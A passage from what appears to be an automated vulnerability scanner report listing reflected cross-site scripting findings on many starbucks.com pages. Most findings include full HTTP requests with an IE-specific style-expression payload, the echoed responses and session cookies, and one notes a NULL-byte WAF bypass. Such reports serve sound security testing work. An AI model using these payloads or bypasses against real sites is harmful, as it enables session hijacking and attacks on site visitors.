GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:51:46 GMT Connection: close Content-Length: 54456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/> ...[SNIP]...
3.21. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/africa-arabia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:18 GMT Connection: close Content-Length: 41207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/> ...[SNIP]...
3.22. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/asia-pacific
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:23 GMT Connection: close Content-Length: 40730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/> ...[SNIP]...
3.23. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:32:57 GMT Connection: close Content-Length: 42564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/> ...[SNIP]...
3.24. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/latin-america
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:15 GMT Connection: close Content-Length: 44497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/> ...[SNIP]...
3.25. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/multi-region-blends
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:29 GMT Connection: close Content-Length: 44773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/> ...[SNIP]...
3.26. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:22 GMT Connection: close Content-Length: 41054
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/> ...[SNIP]...
3.27. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:45 GMT Connection: close Content-Length: 37419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/> ...[SNIP]...
3.28. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:32 GMT Content-Length: 72476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/> ...[SNIP]...
3.29. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:18:14 GMT Connection: close Content-Length: 61971
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/> ...[SNIP]...
3.30. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/frappuccino-blended-beverages
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:12:51 GMT Connection: close Content-Length: 50806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/> ...[SNIP]...
3.31. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:18:45 GMT Connection: close Content-Length: 56860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/> ...[SNIP]...
3.32. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/cranberry-bliss-bar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:04:47 GMT Connection: close Content-Length: 41261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/> ...[SNIP]...
3.33. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:19:06 GMT Connection: close Content-Length: 48718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/> ...[SNIP]...
3.34. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:19 GMT Connection: close Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/> ...[SNIP]...
3.35. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/20-under-200
Issue detail
